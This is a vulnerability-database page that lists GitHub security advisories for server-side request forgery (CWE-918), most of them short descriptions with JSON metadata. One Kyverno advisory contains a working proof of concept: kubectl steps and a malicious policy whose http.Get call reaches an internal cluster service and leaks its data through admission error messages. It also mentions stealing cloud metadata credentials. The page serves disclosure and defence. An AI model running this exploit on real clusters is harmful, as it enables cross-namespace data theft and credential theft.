Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4628 vulnerabilities reference this CWE, most recent first.

GHSA-RG43-2QFX-HV4G

Vulnerability from github – Published: 2022-05-14 03:38 – Updated: 2022-05-14 03:38
VLAI
Details

GroupViewProxyServlet in RoomWizard before 4.4.x allows SSRF via the url parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-7055"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-15T10:29:00Z",
    "severity": "HIGH"
  },
  "details": "GroupViewProxyServlet in RoomWizard before 4.4.x allows SSRF via the url parameter.",
  "id": "GHSA-rg43-2qfx-hv4g",
  "modified": "2022-05-14T03:38:49Z",
  "published": "2022-05-14T03:38:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7055"
    },
    {
      "type": "WEB",
      "url": "http://misteralfa-hack.blogspot.cl/2018/02/steelcase-sala-por-favor-y-todos-tus.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG64-8MRM-6X23

Vulnerability from github – Published: 2026-02-16 15:32 – Updated: 2026-02-16 15:32
VLAI
Details

A flaw has been found in GeekAI up to 4.2.4. The affected element is the function Download of the file api/handler/net_handler.go. This manipulation of the argument url causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2558"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-16T14:16:18Z",
    "severity": "MODERATE"
  },
  "details": "A flaw has been found in GeekAI up to 4.2.4. The affected element is the function Download of the file api/handler/net_handler.go. This manipulation of the argument url causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
  "id": "GHSA-rg64-8mrm-6x23",
  "modified": "2026-02-16T15:32:47Z",
  "published": "2026-02-16T15:32:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2558"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yangjian102621/geekai/issues/256"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yangjian102621/geekai/issues/256#issue-3888814886"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.346166"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.346166"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.750730"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RG6M-2R9V-C5FJ

Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2025-10-22 00:32
VLAI
Details

The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-21985"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-26T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.",
  "id": "GHSA-rg6m-2r9v-c5fj",
  "modified": "2025-10-22T00:32:13Z",
  "published": "2022-05-24T19:03:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21985"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21985"
    },
    {
      "type": "WEB",
      "url": "https://www.vmware.com/security/advisories/VMSA-2021-0010.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/162812/VMware-Security-Advisory-2021-0010.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/163487/VMware-vCenter-Server-Virtual-SAN-Health-Check-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG78-GCXQ-8369

Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-05-24 19:17
VLAI
Details

Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-21649"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-06T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \\controller\\index.php, which can be exploited via the sql() method.",
  "id": "GHSA-rg78-gcxq-8369",
  "modified": "2022-05-24T19:17:00Z",
  "published": "2022-05-24T19:17:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-21649"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lolipop1234/XXD/issues/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-RG7M-27F9-6XR8

Vulnerability from github – Published: 2025-07-04 03:30 – Updated: 2025-07-04 03:30
VLAI
Details

The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the 'wp_ajax_paym_status' AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6729"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-04T03:15:22Z",
    "severity": "MODERATE"
  },
  "details": "The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the \u0027wp_ajax_paym_status\u0027 AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
  "id": "GHSA-rg7m-27f9-6xr8",
  "modified": "2025-07-04T03:30:32Z",
  "published": "2025-07-04T03:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6729"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/woocommerce-paymaster-gateway-019"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG9M-JXJW-MQJ6

Vulnerability from github – Published: 2026-03-19 18:31 – Updated: 2026-03-24 03:31
VLAI
Details

The backend database management connection test feature in wgcloud v3.6.3 has a server-side request forgery (SSRF) vulnerability. This issue can be exploited to make the server send requests to probe the internal network, remotely download malicious files, and perform other dangerous operations.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-30404"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-19T16:16:02Z",
    "severity": "HIGH"
  },
  "details": "The backend database management connection test feature in wgcloud v3.6.3 has a server-side request forgery (SSRF) vulnerability. This issue can be exploited to make the server send requests to probe the internal network, remotely download malicious files, and perform other dangerous operations.",
  "id": "GHSA-rg9m-jxjw-mqj6",
  "modified": "2026-03-24T03:31:19Z",
  "published": "2026-03-19T18:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30404"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TTTlw1024/qwe/issues/3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tianshiyeben/wgcloud/issues/98"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RGCC-VXWC-JXF9

Vulnerability from github – Published: 2026-04-20 12:32 – Updated: 2026-04-20 12:32
VLAI
Details

A security vulnerability has been detected in moxi624 Mogu Blog v2 up to 5.2. Affected by this vulnerability is the function LocalFileServiceImpl.uploadPictureByUrl of the file mogu_picture/src/main/java/com/moxi/mogublog/picture/service/impl/LocalFileServiceImpl.java of the component Picture Storage Service. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6625"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-20T10:16:17Z",
    "severity": "MODERATE"
  },
  "details": "A security vulnerability has been detected in moxi624 Mogu Blog v2 up to 5.2. Affected by this vulnerability is the function LocalFileServiceImpl.uploadPictureByUrl of the file mogu_picture/src/main/java/com/moxi/mogublog/picture/service/impl/LocalFileServiceImpl.java of the component Picture Storage Service. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-rgcc-vxwc-jxf9",
  "modified": "2026-04-20T12:32:01Z",
  "published": "2026-04-20T12:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6625"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ccccccctiiiiiiii-lab/public_exp/issues/3"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/792417"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/358260"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/358260/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RGGM-JJMC-3394

Vulnerability from github – Published: 2026-04-14 22:37 – Updated: 2026-04-14 22:37
VLAI
Summary
Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access
Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library (pkg/cel/libs/http/) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.

Affected Versions

  • Kyverno >= 1.16.0 (with policies.kyverno.io CRDs enabled, which is the default)
  • Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)

Details

The http.Get() and http.Post() functions available in CEL-based policies (policies.kyverno.io API group) do not enforce any URL restrictions. Unlike resource.Lib which enforces namespace boundaries for namespaced policies, the http.Lib allows unrestricted access to any URL.

Vulnerable Code: pkg/cel/libs/http/http.go

func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
    req, err := http.NewRequestWithContext(context.TODO(), "GET", url, nil)
    // NO URL VALIDATION - no blocklist, no namespace restrictions
    ...
}

Contrast with resource.Lib which enforces namespace:

// pkg/cel/libs/resource/lib.go
func Lib(namespace string, v *version.Version) cel.EnvOption {
    return cel.Lib(&lib{namespace: namespace, version: v})  // Namespace enforced
}

This is a different code path from previously reported issues: - GHSA-8p9x-46gm-qfx2: pkg/engine/apicall/apiCall.go (URLPath) - Fixed - GHSA-459x-q9hg-4gpq: pkg/engine/apicall/executor.go (Service.URL) - Different feature (apiCall vs CEL http) - This issue: pkg/cel/libs/http/http.go (CEL http.Get/http.Post) - Not fixed

PoC

Tested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).

A complete automated PoC script is attached. Manual steps below:

1. Setup attacker with namespace-scoped permissions

kubectl create namespace attacker-ns
kubectl create serviceaccount namespace-admin -n attacker-ns

cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: namespace-admin-role
  namespace: attacker-ns
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["create", "get", "list"]
  - apiGroups: ["policies.kyverno.io"]
    resources: ["namespacedvalidatingpolicies"]
    verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: namespace-admin-binding
  namespace: attacker-ns
subjects:
  - kind: ServiceAccount
    name: namespace-admin
    namespace: attacker-ns
roleRef:
  kind: Role
  name: namespace-admin-role
  apiGroup: rbac.authorization.k8s.io
EOF

2. Create sensitive internal service (simulating internal API or cloud metadata)

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: internal-api
  namespace: kube-system
  labels:
    app: internal-api
spec:
  containers:
  - name: server
    image: hashicorp/http-echo
    args:
      - "-text={\"secret\": \"STOLEN_INTERNAL_SECRET_12345\", \"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\"}"
      - "-listen=:8080"
---
apiVersion: v1
kind: Service
metadata:
  name: internal-api
  namespace: kube-system
spec:
  selector:
    app: internal-api
  ports:
  - port: 80
    targetPort: 8080
EOF

3. Verify attacker cannot access kube-system directly

kubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin
# Output: no

4. Create malicious NamespacedValidatingPolicy (as attacker)

cat <<EOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -
apiVersion: policies.kyverno.io/v1beta1
kind: NamespacedValidatingPolicy
metadata:
  name: cel-ssrf-poc
  namespace: attacker-ns
spec:
  matchConstraints:
    resourceRules:
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["CREATE"]
        resources: ["configmaps"]
  variables:
    - name: stolenData
      expression: |
        http.Get('http://internal-api.kube-system.svc.cluster.local')
  validations:
    - expression: "false"
      message: "Validation failed"
      messageExpression: |
        'SSRF_LEAKED: secret=' + variables.stolenData['secret'] + ' token=' + variables.stolenData['token']
EOF

5. Trigger exploit and exfiltrate data

kubectl create configmap trigger --from-literal=x=y -n attacker-ns \
  --as=system:serviceaccount:attacker-ns:namespace-admin

6. Result - Secret data exfiltrated

error: failed to create configmap: admission webhook "nvpol.validate.kyverno.svc-fail" 
denied the request: Policy cel-ssrf-poc failed: 
SSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

Impact

  1. Cross-namespace data access: Users with only namespace-scoped permissions can access services in any namespace
  2. Cloud credential theft: Access to http://169.254.169.254/... allows stealing AWS/GCP/Azure IAM credentials
  3. Data exfiltration: HTTP response data exposed via validation error messages or audit annotations
  4. Breaks namespace isolation: Inconsistent with Kyverno's security model where resource.Lib enforces namespace boundaries

Affected Policies

All CEL-based namespaced policies in policies.kyverno.io API group: - NamespacedValidatingPolicy - NamespacedMutatingPolicy - NamespacedDeletingPolicy - NamespacedImageValidatingPolicy

Suggested Fix

Add namespace and URL restrictions to pkg/cel/libs/http/http.go, similar to how resource.Lib enforces namespace boundaries:

type lib struct {
    namespace string  // Add namespace parameter
    version   *version.Version
}

func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
    if err := r.validateURL(url); err != nil {
        return nil, fmt.Errorf("blocked URL: %w", err)
    }
    // ... existing code
}

func (r *contextImpl) validateURL(urlStr string) error {
    // Block cloud metadata (169.254.0.0/16)
    // Block localhost/loopback (127.0.0.0/8)
    // For namespaced policies: restrict to same namespace services only
}

Attached kyverno-cel-ssrf-poc.sh

Credit

Discovered by: Igor Stepansky Organization: Orca Security Email: igor.stepansky@orca.security Personal Email: stepanskyigor@gmail.com

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kyverno/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4789"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:37:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Kyverno\u0027s CEL HTTP library (`pkg/cel/libs/http/`) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.\n\n## Affected Versions\n\n- Kyverno \u003e= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)\n- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)\n\n## Details\n\nThe `http.Get()` and `http.Post()` functions available in CEL-based policies (`policies.kyverno.io` API group) do not enforce any URL restrictions. Unlike `resource.Lib` which enforces namespace boundaries for namespaced policies, the `http.Lib` allows unrestricted access to any URL.\n\n**Vulnerable Code:** `pkg/cel/libs/http/http.go`\n```go\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    req, err := http.NewRequestWithContext(context.TODO(), \"GET\", url, nil)\n    // NO URL VALIDATION - no blocklist, no namespace restrictions\n    ...\n}\n```\n\n**Contrast with resource.Lib** which enforces namespace:\n```go\n// pkg/cel/libs/resource/lib.go\nfunc Lib(namespace string, v *version.Version) cel.EnvOption {\n    return cel.Lib(\u0026lib{namespace: namespace, version: v})  // Namespace enforced\n}\n```\n\nThis is a **different code path** from previously reported issues:\n- GHSA-8p9x-46gm-qfx2: `pkg/engine/apicall/apiCall.go` (URLPath) - Fixed\n- GHSA-459x-q9hg-4gpq: `pkg/engine/apicall/executor.go` (Service.URL) - Different feature (apiCall vs CEL http)\n- **This issue**: `pkg/cel/libs/http/http.go` (CEL http.Get/http.Post) - **Not fixed**\n\n## PoC\n\nTested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).\n\nA complete automated PoC script is attached. Manual steps below:\n\n### 1. Setup attacker with namespace-scoped permissions\n```bash\nkubectl create namespace attacker-ns\nkubectl create serviceaccount namespace-admin -n attacker-ns\n\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: namespace-admin-role\n  namespace: attacker-ns\nrules:\n  - apiGroups: [\"\"]\n    resources: [\"configmaps\"]\n    verbs: [\"create\", \"get\", \"list\"]\n  - apiGroups: [\"policies.kyverno.io\"]\n    resources: [\"namespacedvalidatingpolicies\"]\n    verbs: [\"create\", \"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: namespace-admin-binding\n  namespace: attacker-ns\nsubjects:\n  - kind: ServiceAccount\n    name: namespace-admin\n    namespace: attacker-ns\nroleRef:\n  kind: Role\n  name: namespace-admin-role\n  apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### 2. Create sensitive internal service (simulating internal API or cloud metadata)\n```bash\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: internal-api\n  namespace: kube-system\n  labels:\n    app: internal-api\nspec:\n  containers:\n  - name: server\n    image: hashicorp/http-echo\n    args:\n      - \"-text={\\\"secret\\\": \\\"STOLEN_INTERNAL_SECRET_12345\\\", \\\"token\\\": \\\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\\\"}\"\n      - \"-listen=:8080\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n  name: internal-api\n  namespace: kube-system\nspec:\n  selector:\n    app: internal-api\n  ports:\n  - port: 80\n    targetPort: 8080\nEOF\n```\n\n### 3. Verify attacker cannot access kube-system directly\n```bash\nkubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin\n# Output: no\n```\n\n### 4. Create malicious NamespacedValidatingPolicy (as attacker)\n```bash\ncat \u003c\u003cEOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -\napiVersion: policies.kyverno.io/v1beta1\nkind: NamespacedValidatingPolicy\nmetadata:\n  name: cel-ssrf-poc\n  namespace: attacker-ns\nspec:\n  matchConstraints:\n    resourceRules:\n      - apiGroups: [\"\"]\n        apiVersions: [\"v1\"]\n        operations: [\"CREATE\"]\n        resources: [\"configmaps\"]\n  variables:\n    - name: stolenData\n      expression: |\n        http.Get(\u0027http://internal-api.kube-system.svc.cluster.local\u0027)\n  validations:\n    - expression: \"false\"\n      message: \"Validation failed\"\n      messageExpression: |\n        \u0027SSRF_LEAKED: secret=\u0027 + variables.stolenData[\u0027secret\u0027] + \u0027 token=\u0027 + variables.stolenData[\u0027token\u0027]\nEOF\n```\n\n### 5. Trigger exploit and exfiltrate data\n```bash\nkubectl create configmap trigger --from-literal=x=y -n attacker-ns \\\n  --as=system:serviceaccount:attacker-ns:namespace-admin\n```\n\n### 6. Result - Secret data exfiltrated\n```\nerror: failed to create configmap: admission webhook \"nvpol.validate.kyverno.svc-fail\" \ndenied the request: Policy cel-ssrf-poc failed: \nSSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\n```\n\n## Impact\n\n1. **Cross-namespace data access**: Users with only namespace-scoped permissions can access services in any namespace\n2. **Cloud credential theft**: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials\n3. **Data exfiltration**: HTTP response data exposed via validation error messages or audit annotations\n4. **Breaks namespace isolation**: Inconsistent with Kyverno\u0027s security model where `resource.Lib` enforces namespace boundaries\n\n## Affected Policies\n\nAll CEL-based namespaced policies in `policies.kyverno.io` API group:\n- `NamespacedValidatingPolicy`\n- `NamespacedMutatingPolicy` \n- `NamespacedDeletingPolicy`\n- `NamespacedImageValidatingPolicy`\n\n## Suggested Fix\n\nAdd namespace and URL restrictions to `pkg/cel/libs/http/http.go`, similar to how `resource.Lib` enforces namespace boundaries:\n```go\ntype lib struct {\n    namespace string  // Add namespace parameter\n    version   *version.Version\n}\n\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    if err := r.validateURL(url); err != nil {\n        return nil, fmt.Errorf(\"blocked URL: %w\", err)\n    }\n    // ... existing code\n}\n\nfunc (r *contextImpl) validateURL(urlStr string) error {\n    // Block cloud metadata (169.254.0.0/16)\n    // Block localhost/loopback (127.0.0.0/8)\n    // For namespaced policies: restrict to same namespace services only\n}\n```\n\nAttached \n[kyverno-cel-ssrf-poc.sh](https://github.com/user-attachments/files/24940825/kyverno-cel-ssrf-poc.sh)\n\n\n## Credit\n\nDiscovered by: Igor Stepansky\nOrganization: Orca Security\nEmail: igor.stepansky@orca.security\nPersonal Email: stepanskyigor@gmail.com",
  "id": "GHSA-rggm-jjmc-3394",
  "modified": "2026-04-14T22:37:20Z",
  "published": "2026-04-14T22:37:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-rggm-jjmc-3394"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/pull/15729"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kyverno/kyverno"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/655822"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access"
}

GHSA-RGHF-WR3J-2757

Vulnerability from github – Published: 2022-05-14 01:57 – Updated: 2022-05-14 01:57
VLAI
Details

Rollup 18 for Microsoft Exchange Server 2010 SP3 and previous versions has an SSRF vulnerability via the username parameter in /owa/auth/logon.aspx in the OWA (Outlook Web Access) login page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-16793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-21T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "Rollup 18 for Microsoft Exchange Server 2010 SP3 and previous versions has an SSRF vulnerability via the username parameter in /owa/auth/logon.aspx in the OWA (Outlook Web Access) login page.",
  "id": "GHSA-rghf-wr3j-2757",
  "modified": "2022-05-14T01:57:32Z",
  "published": "2022-05-14T01:57:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16793"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2018/Sep/38"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/149411/Rollup-18-For-Microsoft-Exchange-Server-2010-SP3-Server-Side-Request-Forgery.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2018/Sep/20"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105386"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RGVV-MQ36-9QV7

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-26 21:30
VLAI
Details

A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-56589"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:15:58Z",
    "severity": "HIGH"
  },
  "details": "A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover.",
  "id": "GHSA-rgvv-mq36-9qv7",
  "modified": "2026-01-26T21:30:32Z",
  "published": "2026-01-22T18:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56589"
    },
    {
      "type": "WEB",
      "url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi"
    },
    {
      "type": "WEB",
      "url": "http://apryse.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

